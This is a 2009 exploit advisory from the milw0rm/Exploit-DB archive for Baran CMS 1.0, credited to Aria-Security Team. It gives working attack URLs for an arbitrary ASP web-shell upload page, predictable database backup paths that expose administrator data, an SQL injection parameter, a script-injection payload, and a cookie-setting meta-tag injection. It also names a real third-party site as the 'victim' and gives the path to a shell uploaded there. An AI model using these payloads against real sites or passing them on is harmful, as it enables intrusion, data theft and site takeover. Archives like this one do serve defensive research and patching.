Baran CMS 1.0 - 'Arbitrary '.ASP' File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation

EDB-ID:

8048

CVE:

N/A




Platform:

ASP

Date:

2009-02-12


#########################################################################################
[0x01] Informations :
Name    : Baran Cms
Version : 1.0 (Personal)
site       : http://www.baran-cms.ir
$$         : 50$
Vul        : (Arbitrary ASP File Upload/DB/SQL/XSS/CM)
Credit    : Aria-Security Team
Website : http://Aria-Security.Net
Contact : Pouya.s3rver@Gmail.com
#########################################################################################
[0x02] Arbitrary ASP File Upload :
http://site.ir/upadmini/DEMO.asp
Up to System
shell uploaded in : http://site.ir/upadmini/Uploads/[Name.asp]
example             : http://www.zenyan.ir/upadmini/Uploads/sh3ller.asp
------------------------------------------------------------
[0x03] Database backups :
The Latest generated Database's backups
http://site.ir/[Sitename]dbdb/[1.zip,2.zip,3.zip,n+1.zip !?!]
admin.mdb + db.mdb
admin.mdb :  Administrator Information
db.mdb       :  data file
------------------------------------------------------------
[0x04] SQL :
http://site.ir/main/default.asp?CatId=[SQL]
------------------------------------------------------------
[0x05] XSS :
http://site.ir/main/default.asp?CatId=<ScrIpT>("Pouya_Server")</ScrIpT>
------------------------------------------------------------
[0x06] CM :
http://site.ir/main/default.asp?CatId=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
------------------------------------------------------------
Victem : http://www.zenyan.ir
########################################################################################
Special Thanks : The-0utl4w,AURA,Zac003,Sasan_4shir,Reza.exe,
                           black.Hat,Irsdl,T3rr0r1st,hadihadi,M0rt,Magic-Boy,Str0ke
                         Sc0rpion,Black.Shadowes,Ali_aria,bl2k,Tabalooga,Virangar,Pouya_Server
                           And All my Friend's

# milw0rm.com [2009-02-12]